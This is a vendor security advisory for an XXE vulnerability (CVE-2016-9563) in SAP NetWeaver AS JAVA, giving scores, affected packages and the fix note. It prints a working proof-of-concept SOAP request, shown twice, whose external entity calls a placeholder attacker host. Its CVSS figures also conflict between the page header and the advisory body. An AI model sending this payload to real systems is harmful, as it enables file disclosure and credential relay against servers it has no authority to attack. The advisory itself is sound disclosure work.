Lucene search

K
erpscanERPScanERPSCAN-16-034
HistorySep 03, 2016 - 12:00 a.m.

SAP NetWeaver AS JAVA - XXE vulnerability in BC-BMT-BPM-DSK component (CVE-2016-9563)

2016-09-0300:00:00
erpscan.io
23

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

4 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

0.919 High

EPSS

Percentile

98.7%

Application: SAP NetWeaver AS JAVA **Versions Affected:**SAP NetWeaver AS JAVA 7.5 **Vendor URL: ** SAP **Bugs:**XXE **Reported: **09.03.2016 **Vendor response: **10.03.2016 **Date of Public Advisory:**09.08.2016 **Reference: **SAP Security Note 2296909 Author: Vahagn Vardanyan (ERPScan)

VULNERABILITY INFORMATION

Class: XXE
Impact: Denial of Service, Read File
Remotely Exploitable: Yes
Locally Exploitable: No

CVSS Information

CVSS Base Score v3: 6.4 / 10
CVSS Base Vector:

AV: Attack Vector (Related exploit range) Network (N)
AC: Attack Complexity (Required attack complexity) High (H)
PR: Privileges Required (Level of privileges needed to exploit) Low (L)
UI: User Interaction (Required user participation) None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U)
C: Impact to Confidentiality Low (L)
I: Impact to Integrity Low (L)
A: Impact to Availability High (H)

Description

  1. It allows an attacker to perform a DoS attack (for example, an XML Entity expansion attack)
  2. An SMB Relay attack is a type of man-in-the-middle attack when an attacker asks a victim to authenticate into a machine controlled by the attacker, then relays the credentials to the target. The attackers forward the authentication information both ways, that provides them with access.

Business risk

An attacker can use an XML external entity vulnerability to send specially crafted unauthorized XML requests which will be processed by XML parser. An attacker can use an XML external entity vulnerability to obtain unauthorized access to an OS filesystem.

VULNERABLE PACKAGES

BPEM PORTAL CONTENT 7.20
BPEM PORTAL CONTENT 7.30
BPEM PORTAL CONTENT 7.31
BPEM PORTAL CONTENT 7.40
BPEM PORTAL CONTENT 7.50

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2296909.

TECHNICAL DESCRIPTION

PoC POST /sap.com~tc~bpem~him~uwlconn~provider~web/bpemuwlconn HTTP/1.1 Content-Type: text/xml User-Agent: ERPscan Host: SAP_IP:SAP_PORT Content-Length: 480 Connection: Keep-Alive Cache-Control: no-cache Authorization: Basic ZXJwc2NhbjplcnBzY2Fu <!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker_host"> ]><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <SOAP-ENV:Body> <m:isBPMSInUse xmlns:m="http://api.facade.bpem.sap.com/"/> &xxe;</SOAP-ENV:Body> </SOAP-ENV:Envelope>

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

|

PoC


POST /sap.com~tc~bpem~him~uwlconn~provider~web/bpemuwlconn HTTP/1.1

Content-Type: text/xml

User-Agent: ERPscan

Host: SAP_IP:SAP_PORT

Content-Length: 480

Connection: Keep-Alive

Cache-Control: no-cache

Authorization: Basic ZXJwc2NhbjplcnBzY2Fu

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker_host"> ]><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">

<SOAP-ENV:Body>

<m:isBPMSInUse xmlns:m="http://api.facade.bpem.sap.com/"/>

&xxe;</SOAP-ENV:Body>

</SOAP-ENV:Envelope>

—|—

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

4 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

0.919 High

EPSS

Percentile

98.7%